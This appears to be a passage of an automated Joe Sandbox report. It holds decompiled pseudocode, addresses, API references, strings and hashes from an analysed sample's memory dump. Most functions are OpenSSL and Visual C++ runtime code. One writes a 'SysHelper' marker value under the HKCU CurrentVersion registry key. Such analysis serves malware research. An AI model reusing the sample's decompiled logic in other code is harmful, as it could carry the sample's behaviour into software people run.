											E004512D0(_t34, _t38, _t39, _t45, __eflags, 9, 0x6b, 0x70, ".\\crypto\\pem\\pem_lib.c", 0x1fd);
											__eflags = 0;
											return 0;
										}
									} else {
										E004512D0(__ebx, _t38, _t39, __ebp, __eflags, 9, 0x6b, 0x6a, ".\\crypto\\pem\\pem_lib.c", 0x1f9);
										__eflags = 0;
										return 0;
									}
								}
							}
						} else {
							E004512D0(__ebx, _t38, _t39, __ebp, _t60, 9, 0x6b, 0x6b, ".\\crypto\\pem\\pem_lib.c", 0x1f4);
							L5:
							return 0;
						}
					}
				}
				L27:
			}

0x00463350
0x00463350
0x00463350
0x00463351
0x00463356
0x0046335a
0x00463362
0x004634c7
0x004634cd
0x00463368
0x00463368
0x0046336c
0x00000000
0x0046337a
0x00463382
0x0046338a
0x0046338c
0x004633ab
0x004633af
0x00000000
0x004633b1
0x004633b1
0x004633b5
0x00000000
0x004633b7
0x004633b9
0x004633ca
0x004633cc
0x004633eb
0x004633ed
0x004633ef
0x004633fd
0x004633fd
0x00463400
0x00463421
0x00463430
0x00463432
0x00463451
0x00463451
0x00463454
0x00463456
0x00463457
0x00463457
0x00463459
0x0046345c
0x00000000
0x00000000
0x0046345e
0x00463461
0x0046346f
0x0046346f
0x00000000
0x0046346f
0x00463463
0x00463463
0x00463466
0x00000000
0x00000000
0x00463468
0x0046346b
0x0046346d
0x00000000
0x00000000
0x00463473
0x00463476
0x0046347e
0x00463480
0x00463483
0x00463487
0x00463488
0x0046348a
0x004634b5
0x004634bf
0x004634c5
0x0046348c
0x0046349c
0x004634a4
0x004634a8
0x004634a8
0x00000000
0x0046348a
0x00463434
0x00463444
0x0046344c
0x00463450
0x00463450
0x00000000
0x00000000
0x00000000
0x004633f1
0x004633f1
0x004633f1
0x004633f3
0x00000000
0x00000000
0x004633f5
0x004633f8
0x004633f9
0x004633fb
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004633fb
0x00463402
0x00463412
0x0046341a
0x0046341e
0x0046341e
0x004633ce
0x004633de
0x004633e6
0x004633ea
0x004633ea
0x004633cc
0x004633b5
0x0046338e
0x0046339e
0x004633a7
0x004633aa
0x004633aa
0x0046338c
0x0046336c
0x00000000

APIs

_strncmp.LIBCMT ref: 00463382
_strncmp.LIBCMT ref: 004633C2

Strings

.\crypto\pem\pem_lib.c, xrefs: 00463393, 004633D3, 00463407, 00463439, 00463491
DEK-Info: , xrefs: 00463422
ENCRYPTED, xrefs: 004633BC
Proc-Type: , xrefs: 0046337C

Memory Dump Source

Source File: 00000006.00000002.634364468.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.634364468.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.634364468.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_E640.jbxd

Yara matches

Similarity

API ID: _strncmp
String ID: .\crypto\pem\pem_lib.c$DEK-Info: $ENCRYPTED$Proc-Type:
API String ID: 909875538-2908105608
Opcode ID: ab3012ab59146815ebf28714d7aa14745dda8ec0f3d5ba1861611fdbbd5b6dc0
Instruction ID: 5da15f4c8f0622be9955200bbf206a62195e74188b9aea783317ae4bc8ba6fc6
Opcode Fuzzy Hash: ab3012ab59146815ebf28714d7aa14745dda8ec0f3d5ba1861611fdbbd5b6dc0
Instruction Fuzzy Hash: B7413EA1BC83C129F721592ABC03F9763854B51B17F080467FA88E52C3FB9D8987419F

Uniqueness

Uniqueness Score: -1.00%

Function 004C5D39 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 100
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E004C5D39(void* __ebx, void* __edx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v32;
				unsigned int _v52;
				signed int _v56;
				signed int _v60;
				signed int _t32;
				signed int* _t34;
				signed int _t36;
				signed int _t42;
				signed int _t47;
				char* _t48;
				signed int _t49;
				signed int _t52;
				unsigned int _t58;
				signed int _t59;
				signed int _t60;
				void* _t63;
				signed int _t66;
				signed int _t73;
				void* _t78;
				char* _t79;
				signed int _t80;
				signed int _t81;
				signed int _t83;
				void* _t89;
				void* _t93;

				_t63 = __edx;
				_t89 = _t93;
				_t78 = E0042501F(__ebx);
				if(_t78 != 0) {
					_push(__ebx);
					__eflags =  *(_t78 + 0x24);
					if( *(_t78 + 0x24) != 0) {
						L7:
						_t79 =  *(_t78 + 0x24);
						_t32 = E0042C0FD(_t79, 0x86, E004C5D13(_a4));
						__eflags = _t32;
						if(_t32 != 0) {
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							E004242FD(0x86, _t63);
							asm("int3");
							_push(_t89);
							__eflags = _v32;
							_push(_t79);
							if(__eflags != 0) {
								_t80 = _v16;
								__eflags = _t80;
								if(__eflags == 0) {
									goto L10;
								} else {
									_t7 = _t80 - 1; // -1
									_t36 = E0043FF8E(_v20, _t80, E004C5D13(_v12), _t7);
									__eflags = _t36;
									if(_t36 == 0) {
										goto L11;
									} else {
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										E004242FD(0x86, _t63);
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										_t58 = _v52;
										_push(0);
										__eflags = _t58;
										if(_t58 == 0) {
											L34:
											return _v60;
										} else {
											_push(_t80);
											_push(0x86);
											_t52 = _t58;
											_t83 = _v56;
											__eflags = _t83 & 0x00000003;
											_t73 = _v60;
											if((_t83 & 0x00000003) != 0) {
												while(1) {
													_t42 =  *_t83;
													_t83 = _t83 + 1;
													 *_t73 = _t42;
													_t73 = _t73 + 1;
													_t58 = _t58 - 1;
													__eflags = _t58;
													if(_t58 == 0) {
														goto L26;
													}
													__eflags = _t42;
													if(_t42 == 0) {
														__eflags = _t73 & 0x00000003;
														if((_t73 & 0x00000003) == 0) {
															L30:
															_t52 = _t58;
															_t59 = _t58 >> 2;
															__eflags = _t59;
															if(_t59 != 0) {
																goto L46;
															} else {
																goto L31;
															}
														} else {
															while(1) {
																 *_t73 = _t42;
																_t73 = _t73 + 1;
																_t58 = _t58 - 1;
																__eflags = _t58;
																if(_t58 == 0) {
																	goto L49;
																}
																__eflags = _t73 & 0x00000003;
																if((_t73 & 0x00000003) != 0) {
																	continue;
																} else {
																	goto L30;
																}
																goto L50;
															}
															goto L49;
														}
													} else {
														__eflags = _t83 & 0x00000003;
														if((_t83 & 0x00000003) != 0) {
															continue;
														} else {
															_t52 = _t58;
															_t60 = _t58 >> 2;
															__eflags = _t60;
															if(_t60 != 0) {
																goto L36;
															} else {
																goto L23;
															}
														}
													}
													goto L50;
												}
												goto L26;
											} else {
												_t60 = _t58 >> 2;
												__eflags = _t60;
												if(_t60 != 0) {
													do {
														L36:
														_t47 =  *_t83 ^ 0xffffffff ^ 0x7efefeff +  *_t83;
														_t66 =  *_t83;
														_t83 = _t83 + 4;
														__eflags = _t47 & 0x81010100;
														if((_t47 & 0x81010100) == 0) {
															goto L35;
														} else {
															__eflags = _t66;
															if(_t66 == 0) {
																__eflags = 0;
																 *_t73 = 0;
																goto L45;
															} else {
																__eflags = _t66;
																if(_t66 == 0) {
																	 *_t73 = _t66 & 0x000000ff;
																	goto L45;
																} else {
																	__eflags = _t66 & 0x00ff0000;
																	if((_t66 & 0x00ff0000) == 0) {
																		 *_t73 = _t66 & 0x0000ffff;
																		goto L45;
																	} else {
																		__eflags = _t66 & 0xff000000;
																		if((_t66 & 0xff000000) != 0) {
																			goto L35;
																		} else {
																			 *_t73 = _t66;
																			L45:
																			_t73 = _t73 + 4;
																			_t42 = 0;
																			_t59 = _t60 - 1;
																			__eflags = _t59;
																			if(_t59 != 0) {
																				L46:
																				_t42 = 0;
																				__eflags = 0;
																				do {
																					 *_t73 = 0;
																					_t73 = _t73 + 4;
																					_t59 = _t59 - 1;
																					__eflags = _t59;
																				} while (_t59 != 0);
																			}
																			_t52 = _t52 & 0x00000003;
																			__eflags = _t52;
																			if(_t52 != 0) {
																				goto L31;
																			} else {
																				L49:
																				return _v60;
																			}
																		}
																	}
																}
															}
														}
														goto L50;
														L35:
														 *_t73 = _t66;
														_t73 = _t73 + 4;
														_t60 = _t60 - 1;
														__eflags = _t60;
													} while (_t60 != 0);
													L23:
													_t52 = _t52 & 0x00000003;
													__eflags = _t52;
													if(_t52 == 0) {
														goto L26;
													} else {
														goto L24;
													}
												} else {
													while(1) {
														L24:
														_t42 =  *_t83;
														_t83 = _t83 + 1;
														 *_t73 = _t42;
														_t73 = _t73 + 1;
														__eflags = _t42;
														if(_t42 == 0) {
															break;
														}
														_t52 = _t52 - 1;
														__eflags = _t52;
														if(_t52 != 0) {
															continue;
														} else {
															L26:
															return _v60;
														}
														goto L50;
													}
													L32:
													_t52 = _t52 - 1;
													__eflags = _t52;
													if(_t52 != 0) {
														L31:
														 *_t73 = _t42;
														_t73 = _t73 + 1;
														__eflags = _t73;
														goto L32;
													}
													goto L34;
												}
											}
										}
									}
								}
							} else {
								L10:
								_t34 = E00425208(__eflags);
								_t81 = 0x16;
								 *_t34 = _t81;
								E004242D2();
								_t36 = _t81;
								L11:
								return _t36;
							}
						} else {
							_t48 = _t79;
							goto L5;
						}
					} else {
						_t49 = E00428C96(0x86, 1);
						 *(_t78 + 0x24) = _t49;
						__eflags = _t49;
						if(_t49 != 0) {
							goto L7;
						} else {
							_t48 = "Visual C++ CRT: Not enough memory to complete call to strerror.";
							L5:
							goto L6;
						}
					}
				} else {
					_t48 = "Visual C++ CRT: Not enough memory to complete call to strerror.";
					L6:
					return _t48;
				}
				L50:
			}

0x004c5d39
0x004c5d3a
0x004c5d42
0x004c5d46
0x004c5d4f
0x004c5d58
0x004c5d5b
0x004c5d78
0x004c5d7b
0x004c5d86
0x004c5d8e
0x004c5d90
0x004c5d96
0x004c5d97
0x004c5d98
0x004c5d99
0x004c5d9a
0x004c5d9b
0x004c5da0
0x004c5da1
0x004c5da4
0x004c5da8
0x004c5da9
0x004c5dbf
0x004c5dc2
0x004c5dc4
0x00000000
0x004c5dc6
0x004c5dc6
0x004c5dd8
0x004c5de0
0x004c5de2
0x00000000
0x004c5de4
0x004c5de6
0x004c5de7
0x004c5de8
0x004c5de9
0x004c5dea
0x004c5deb
0x004c5df0
0x004c5df1
0x004c5df2
0x004c5df3
0x004c5df4
0x004c5df5
0x004c5df6
0x004c5df7
0x004c5df8
0x004c5df9
0x004c5dfa
0x004c5dfb
0x004c5dfc
0x004c5dfd
0x004c5dfe
0x004c5dff
0x004c5e00
0x004c5e04
0x004c5e05
0x004c5e07
0x004c5e9f
0x004c5ea4
0x004c5e0d
0x004c5e0d
0x004c5e0e
0x004c5e0f
0x004c5e11
0x004c5e15
0x004c5e1b
0x004c5e1f
0x004c5e2c
0x004c5e2c
0x004c5e2e
0x004c5e31
0x004c5e33
0x004c5e36
0x004c5e36
0x004c5e39
0x00000000
0x00000000
0x004c5e3b
0x004c5e3d
0x004c5e6e
0x004c5e74
0x004c5e8c
0x004c5e8c
0x004c5e8e
0x004c5e8e
0x004c5e91
0x00000000
0x00000000
0x00000000
0x00000000
0x004c5e76
0x004c5e76
0x004c5e76
0x004c5e78
0x004c5e7b
0x004c5e7b
0x004c5e7e
0x00000000
0x00000000
0x004c5e84
0x004c5e8a
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004c5e8a
0x00000000
0x004c5e76
0x004c5e3f
0x004c5e3f
0x004c5e45
0x00000000
0x004c5e47
0x004c5e47
0x004c5e49
0x004c5e49
0x004c5e4c
0x00000000
0x00000000
0x00000000
0x00000000
0x004c5e4c
0x004c5e45
0x00000000
0x004c5e3d
0x00000000
0x004c5e21
0x004c5e21
0x004c5e21
0x004c5e24
0x004c5eaf
0x004c5eaf
0x004c5ebb
0x004c5ebd
0x004c5ebf
0x004c5ec2
0x004c5ec7
0x00000000
0x004c5ec9
0x004c5ec9
0x004c5ecb
0x004c5ef9
0x004c5efb
0x00000000
0x004c5ecd
0x004c5ecd
0x004c5ecf
0x004c5ef5
0x00000000
0x004c5ed1
0x004c5ed1
0x004c5ed7
0x004c5eeb
0x00000000
0x004c5ed9
0x004c5ed9
0x004c5edf
0x00000000
0x004c5ee1
0x004c5ee1
0x004c5efd
0x004c5efd
0x004c5f00
0x004c5f02
0x004c5f02
0x004c5f05
0x004c5f07
0x004c5f07
0x004c5f07
0x004c5f09
0x004c5f09
0x004c5f0b
0x004c5f0e
0x004c5f0e
0x004c5f0e
0x004c5f09
0x004c5f13
0x004c5f13
0x004c5f16
0x00000000
0x004c5f1c
0x004c5f1c
0x004c5f23
0x004c5f23
0x004c5f16
0x004c5edf
0x004c5ed7
0x004c5ecf
0x004c5ecb
0x00000000
0x004c5ea5
0x004c5ea5
0x004c5ea7
0x004c5eaa
0x004c5eaa
0x004c5eaa
0x004c5e4e
0x004c5e4e
0x004c5e4e
0x004c5e51
0x00000000
0x00000000
0x00000000
0x00000000
0x004c5e2a
0x004c5e53
0x004c5e53
0x004c5e53
0x004c5e55
0x004c5e58
0x004c5e5a
0x004c5e5d
0x004c5e5f
0x00000000
0x00000000
0x004c5e61
0x004c5e61
0x004c5e64
0x00000000
0x004c5e66
0x004c5e66
0x004c5e6d
0x004c5e6d
0x00000000
0x004c5e64
0x004c5e98
0x004c5e98
0x004c5e98
0x004c5e9b
0x004c5e93
0x004c5e93
0x004c5e95
0x004c5e95
0x00000000
0x004c5e95
0x00000000
0x004c5e9e
0x004c5e24
0x004c5e1f
0x004c5e07
0x004c5de2
0x004c5dab
0x004c5dab
0x004c5dab
0x004c5db2
0x004c5db3
0x004c5db5
0x004c5dba
0x004c5dbc
0x004c5dbe
0x004c5dbe
0x004c5d92
0x004c5d92
0x00000000
0x004c5d92
0x004c5d5d
0x004c5d60
0x004c5d65
0x004c5d6a
0x004c5d6c
0x00000000
0x004c5d6e
0x004c5d6e
0x004c5d73
0x00000000
0x004c5d74
0x004c5d6c
0x004c5d48
0x004c5d48
0x004c5d75
0x004c5d77
0x004c5d77
0x00000000

APIs

__getptd_noexit.LIBCMT ref: 004C5D3D

Part of subcall function 0042501F: GetLastError.KERNEL32(?,i;B,0042520D,00420CE9,?,?,00423B69,?), ref: 00425021
Part of subcall function 0042501F: __calloc_crt.LIBCMT ref: 00425042
Part of subcall function 0042501F: __initptd.LIBCMT ref: 00425064
Part of subcall function 0042501F: GetCurrentThreadId.KERNEL32 ref: 0042506B
Part of subcall function 0042501F: SetLastError.KERNEL32(00000000,i;B,0042520D,00420CE9,?,?,00423B69,?), ref: 00425083

__calloc_crt.LIBCMT ref: 004C5D60
__get_sys_err_msg.LIBCMT ref: 004C5D7E
__invoke_watson.LIBCMT ref: 004C5D9B
__get_sys_err_msg.LIBCMT ref: 004C5DCD
__invoke_watson.LIBCMT ref: 004C5DEB

Strings

Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 004C5D48, 004C5D6E

Memory Dump Source

Source File: 00000006.00000002.634364468.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.634364468.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.634364468.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_E640.jbxd

Yara matches

Similarity

API ID: ErrorLast__calloc_crt__get_sys_err_msg__invoke_watson$CurrentThread__getptd_noexit__initptd
String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
API String ID: 2139067377-798102604
Opcode ID: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
Instruction ID: efefb7cdb09aa89a66c944e42d5018451410fe076c3b278b171ca9447b521f4c
Opcode Fuzzy Hash: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
Instruction Fuzzy Hash: 8E11E935601F2567D7613A66AC05FBF738CDF007A4F50806FFE0696241E629AC8042AD

Uniqueness

Uniqueness Score: -1.00%

Function 0040C6A0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 49
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040C6A0() {
				void* _v8;
				char _v12;
				int _v16;
				int _v20;
				char _t16;

				_v8 = 0;
				_t16 = RegOpenKeyExW(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion", 0, 0xf003f,  &_v8);
				if(_t16 != 0) {
					L4:
					return 1;
				} else {
					_v12 = _t16;
					_v20 = 4;
					_v16 = 4;
					if(RegQueryValueExW(_v8, L"SysHelper", 0,  &_v20,  &_v12,  &_v16) != 0) {
						_v12 = 1;
						RegSetValueExW(_v8, L"SysHelper", 0, 4,  &_v12, 4);
						RegCloseKey(_v8);
						goto L4;
					} else {
						RegCloseKey(_v8);
						return 0;
					}
				}
			}

0x0040c6a9
0x0040c6c2
0x0040c6ca
0x0040c734
0x0040c739
0x0040c6cc
0x0040c6cc
0x0040c6d6
0x0040c6e1
0x0040c6fb
0x0040c711
0x0040c725
0x0040c72e
0x00000000
0x0040c6fd
0x0040c700
0x0040c70b
0x0040c70b
0x0040c6fb

APIs

RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion,00000000,000F003F,?), ref: 0040C6C2
RegQueryValueExW.ADVAPI32(00000000,SysHelper,00000000,00000004,?,?), ref: 0040C6F3
RegCloseKey.ADVAPI32(00000000), ref: 0040C700
RegSetValueExW.ADVAPI32(00000000,SysHelper,00000000,00000004,?,00000004), ref: 0040C725
RegCloseKey.ADVAPI32(00000000), ref: 0040C72E

Strings

Software\Microsoft\Windows\CurrentVersion, xrefs: 0040C6B8
SysHelper, xrefs: 0040C6EB, 0040C71D

Memory Dump Source

Source File: 00000006.00000002.634364468.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.634364468.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.634364468.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_E640.jbxd

Yara matches

Similarity

API ID: CloseValue$OpenQuery
String ID: Software\Microsoft\Windows\CurrentVersion$SysHelper
API String ID: 3962714758-1667468722
Opcode ID: 1b3e89e7960631348278952d172054be4d8a3531237e516afd507403cd6f8071
Instruction ID: 83d53c3b81c5c3826f22504a9cab54a14a7287ca0244f3776693af22b4817dfa
Opcode Fuzzy Hash: 1b3e89e7960631348278952d172054be4d8a3531237e516afd507403cd6f8071
Instruction Fuzzy Hash: 60112D7594020CFBDB109F91CC86FEEBB78EB04708F2041A5FA04B22A1D7B55B14AB58

Uniqueness

Uniqueness Score: -1.00%

Function 004573F0 Relevance: 10.8, APIs: 1, Strings: 5, Instructions: 251
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 88%

			E004573F0(signed int _a4, signed int _a8, signed int _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24, char _a28, signed int _a60, intOrPtr _a68, char _a72, signed int _a76, signed int _a80, signed int _a84, signed int _a88, intOrPtr _a92, signed int _a96, intOrPtr _a100, signed char _a104) {
				signed int _v0;
				signed int _v4;
				intOrPtr _v8;
				char _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t129;
				intOrPtr _t135;
				signed int _t136;
				signed int _t140;
				void* _t141;
				signed int _t143;
				signed int _t148;
				void* _t150;
				intOrPtr _t154;
				signed char _t160;
				char _t166;
				intOrPtr _t170;
				signed int _t174;
				signed int _t181;
				signed int* _t182;
				intOrPtr _t184;
				intOrPtr _t185;
				void* _t186;
				intOrPtr _t187;
				signed char _t189;
				signed int _t192;
				signed int* _t196;
				signed int _t199;
				intOrPtr* _t200;
				signed int _t203;
				signed int _t205;
				signed int _t206;
				void* _t208;
				intOrPtr _t209;
				signed int _t213;
				intOrPtr _t214;
				intOrPtr* _t217;
				signed int _t220;
				signed int _t221;
				void* _t223;
				signed int _t224;
				signed int _t225;
				signed int _t226;
				signed int _t231;
				intOrPtr* _t232;
				signed int* _t233;
				void* _t235;
				signed int _t240;
				void* _t241;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				intOrPtr _t249;
				intOrPtr _t250;
				signed int _t253;
				signed int _t257;
				void* _t262;
				signed char _t268;

				E0042F7C0(0x40);
				_t129 =  *0x50ad20; // 0x727261cc
				_a60 = _t129 ^ _t253;
				_t187 = _a100;
				_t181 = _a84;
				_t249 = _a68;
				_a28 = _a72;
				_a8 = _a76;
				_v0 = _a80;
				_t220 = 0;
				_a4 = 0x4ffca4;
				_a12 = 0;
				_t188 =  <  ? 0 : _t187;
				_t213 = _a88;
				_a100 =  <  ? 0 : _t187;
				_t189 = _a104;
				if((_t189 & 0x00000040) == 0) {
					_t257 = _t213;
					if(_t257 > 0 || _t257 >= 0 && _t181 >= 0) {
						__eflags = _t189 & 0x00000002;
						if((_t189 & 0x00000002) == 0) {
							__eflags = _t189 & 0x00000004;
							_a16 = 0x20;
							_t179 =  !=  ? _a16 : 0;
							_a12 =  !=  ? _a16 : 0;
						} else {
							_a12 = 0x2b;
						}
					} else {
						_t181 =  ~_t181;
						_a12 = 0x2d;
						asm("adc edx, eax");
						_t213 =  ~_t213;
					}
				}
				_t135 = _a92;
				if((_t189 & 0x00000008) != 0) {
					if(_t135 != 8) {
						__eflags = _a92 - 0x10;
						_t178 =  !=  ? 0x4ffca4 : "0x";
						_a4 =  !=  ? 0x4ffca4 : "0x";
						_t135 = _a92;
					} else {
						_a4 = "0";
					}
				}
				_a16 = "0123456789abcdef";
				_t230 =  !=  ? 1 : _t220;
				_t262 =  !=  ? 1 : _t220;
				_t192 =  ==  ? _a16 : "0123456789ABCDEF";
				_t231 = _t192;
				while(1) {
					_t136 = E0043AE20(_t181, _t213, _t135, 0);
					_a4 = _t181;
					_t181 = _t136;
					 *((char*)(_t253 + _t220 + 0x30)) =  *((intOrPtr*)(_t192 + _t231));
					_t220 = _t220 + 1;
					_t192 = _t181 | _t213;
					if(_t192 == 0) {
						break;
					}
					_t135 = _a92;
					if(_t220 < 0x1a) {
						continue;
					}
					break;
				}
				_t232 = _a4;
				_a16 = _t220;
				if(_t220 != 0x1a) {
					if(__eflags >= 0) {
						E0042AC83();
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						E0042F7C0(4);
						_t140 = _a8;
						_t214 = 0;
						__eflags = _t140;
						_v16 = 0;
						_t196 =  !=  ? _t140 : "<NULL>";
						_t141 = 0;
						_a8 = _t196;
						__eflags =  *_t196;
						if( *_t196 != 0) {
							do {
								_t141 = _t141 + 1;
								__eflags =  *(_t141 + _t196);
							} while ( *(_t141 + _t196) != 0);
						}
						_t199 =  <  ? _t214 : _a16 - _t141;
						__eflags = _a12 & 0x00000001;
						_a16 = _t199;
						if((_a12 & 0x00000001) != 0) {
							_t199 =  ~_t199;
							_a16 = _t199;
						}
						_push(_t181);
						_t182 = _v0;
						_push(_t249);
						_t250 = _v8;
						_push(_t232);
						_t233 = _a4;
						_push(_t220);
						_t221 = _v4;
						__eflags = _t199;
						if(_t199 > 0) {
							while(1) {
								__eflags = _t214 - _a20;
								if(_t214 >= _a20) {
									goto L71;
								}
								__eflags = _t221;
								if(_t221 != 0) {
									__eflags =  *_t182 -  *_t233;
									if( *_t182 >=  *_t233) {
										do {
											__eflags =  *_t221;
											if( *_t221 != 0) {
												 *_t233 =  *_t233 + 0x400;
												__eflags =  *_t233;
												_t150 = E00454F30( *_t221,  *_t233, ".\\crypto\\bio\\b_print.c", 0x2ed);
												_t253 = _t253 + 0x10;
												 *_t221 = _t150;
											} else {
												__eflags =  *_t233;
												if( *_t233 == 0) {
													 *_t233 = 0x400;
												}
												 *_t221 = E00454E50( *_t233, ".\\crypto\\bio\\b_print.c", 0x2e5);
												_t253 = _t253 + 0xc;
												_t206 =  *_t182;
												__eflags = _t206;
												if(_t206 != 0) {
													E0042D8D0(_t152, _v0, _t206);
													_t253 = _t253 + 0xc;
												}
												_v0 = 0;
											}
											__eflags =  *_t182 -  *_t233;
										} while ( *_t182 >=  *_t233);
										_t214 = _v16;
									}
								}
								_t203 =  *_t182;
								__eflags = _t203 -  *_t233;
								if(_t203 <  *_t233) {
									_t148 = _v0;
									__eflags = _t148;
									if(_t148 == 0) {
										 *((char*)(_t203 +  *_t221)) = 0x20;
									} else {
										 *((char*)(_t148 + _t203)) = 0x20;
									}
									 *_t182 =  *_t182 + 1;
									__eflags =  *_t182;
								}
								_t214 = _t214 + 1;
								_t205 = _a16 - 1;
								_v16 = _t214;
								_a16 = _t205;
								__eflags = _t205;
								if(_t205 > 0) {
									continue;
								}
								goto L71;
							}
						}
						L71:
						_t200 = _a8;
						_t143 =  *_t200;
						__eflags = _t143;
						if(_t143 != 0) {
							_a8 = _t200 - _t214;
							while(1) {
								__eflags = _t214 - _a20;
								if(_t214 >= _a20) {
									goto L75;
								}
								E00456F70(_t250, _t221, _t182, _t233, _t143);
								_t253 = _t253 + 0x14;
								_t214 = _v16 + 1;
								_v16 = _t214;
								_t143 =  *((intOrPtr*)(_a8 + _t214));
								__eflags = _t143;
								if(_t143 != 0) {
									continue;
								}
								goto L75;
							}
						}
						L75:
						__eflags = _a16;
						if(_a16 < 0) {
							while(1) {
								__eflags = _t214 - _a20;
								if(_t214 >= _a20) {
									goto L78;
								}
								_t143 = E00456F70(_t250, _t221, _t182, _t233, 0x20);
								_t253 = _t253 + 0x14;
								_t214 = _v16 + 1;
								_t124 =  &_a16;
								 *_t124 = _a16 + 1;
								__eflags =  *_t124;
								_v16 = _t214;
								if( *_t124 < 0) {
									continue;
								}
								goto L78;
							}
						}
						L78:
						return _t143;
					} else {
						goto L18;
					}
				} else {
					_t220 = 0x19;
					_a16 = 0x19;
					L18:
					_t184 = _a100;
					_t217 = _t232;
					 *((char*)(_t253 + _t220 + 0x30)) = 0;
					_t208 = _t184 - _t220;
					_t235 = _t217 + 1;
					do {
						_t154 =  *_t217;
						_t217 = _t217 + 1;
					} while (_t154 != 0);
					_t218 = _t217 - _t235;
					_t156 =  >=  ? _t184 : _t220;
					_t237 = _a96 - ( >=  ? _t184 : _t220);
					_t268 = _a12;
					_t238 = _a96 - ( >=  ? _t184 : _t220) - (_t268 != 0);
					_t209 =  <  ? 0 : _t208;
					_t239 = _a96 - ( >=  ? _t184 : _t220) - (_t268 != 0) - _t217 - _t235;
					_a24 = _t209;
					_t240 =  <  ? 0 : _a96 - ( >=  ? _t184 : _t220) - (_t268 != 0) - _t217 - _t235;
					_t160 = _a104;
					_a96 = _t240;
					if((_t160 & 0x00000010) != 0) {
						_t246 =  >=  ? _t209 : _t240;
						_a24 =  >=  ? _t209 : _t240;
						_t240 = 0;
						_a96 = 0;
					}
					if((_t160 & 0x00000001) != 0) {
						_t240 =  ~_t240;
						_a96 = _t240;
					}
					_t64 =  &_a28; // 0x456c55
					_t185 =  *_t64;
					if(_t240 > 0) {
						_t226 = _a8;
						do {
							E00456F70(_t249, _t185, _t226, _v0, 0x20);
							_t240 = _t240 - 1;
							_t253 = _t253 + 0x14;
						} while (_t240 > 0);
						_t220 = _a16;
						_a96 = _t240;
					}
					_t161 = _a12;
					if(_a12 != 0) {
						E00456F70(_t249, _t185, _a8, _v0, _t161);
						_t253 = _t253 + 0x14;
					}
					_t163 =  *_a4;
					if( *_a4 != 0) {
						_t245 = _a8;
						_t225 = _v0;
						do {
							E00456F70(_t249, _t185, _t245, _t225, _t163);
							_t253 = _t253 + 0x14;
							_t174 = _a4 + 1;
							_a4 = _t174;
							_t163 =  *_t174;
						} while ( *_t174 != 0);
						_t240 = _a96;
						_t220 = _a16;
					}
					if(_a24 > 0) {
						_t244 = _a8;
						_t224 = _v0;
						do {
							E00456F70(_t249, _t185, _t244, _t224, 0x30);
							_t253 = _t253 + 0x14;
							_t170 = _a24 - 1;
							_a24 = _t170;
						} while (_t170 > 0);
						_t240 = _a96;
						_t220 = _a16;
					}
					if(_t220 > 0) {
						_t243 = _a8;
						do {
							_t166 =  *((char*)(_t253 + _t220 + 0x2f));
							_t220 = _t220 - 1;
							E00456F70(_t249, _t185, _t243, _v0, _t166);
							_t253 = _t253 + 0x14;
						} while (_t220 > 0);
						_t240 = _a96;
					}
					if(_t240 < 0) {
						_t242 =  ~_t240;
						do {
							E00456F70(_t249, _t185, _a8, _v0, 0x20);
							_t253 = _t253 + 0x14;
							_t242 = _t242 - 1;
						} while (_t242 != 0);
					}
					_pop(_t223);
					_pop(_t241);
					_pop(_t186);
					return E0042A77E(_t186, _a60 ^ _t253, _t218, _t223, _t241);
				}
			}

0x004573f5
0x004573fa
0x00457401
0x0045740b
0x00457410
0x00457415
0x00457419
0x00457422
0x00457430
0x00457434
0x00457438
0x0045743e
0x00457442
0x00457445
0x00457449
0x0045744d
0x00457454
0x00457456
0x00457458
0x00457470
0x00457473
0x0045747f
0x00457482
0x0045748a
0x0045748f
0x00457475
0x00457475
0x00457475
0x00457460
0x00457460
0x00457462
0x0045746a
0x0045746c
0x0045746c
0x00457458
0x00457493
0x0045749a
0x0045749f
0x004574ac
0x004574b6
0x004574b9
0x004574bd
0x004574a1
0x004574a6
0x004574a6
0x0045749f
0x004574c4
0x004574d3
0x004574db
0x004574dd
0x004574e2
0x004574e4
0x004574e9
0x004574ee
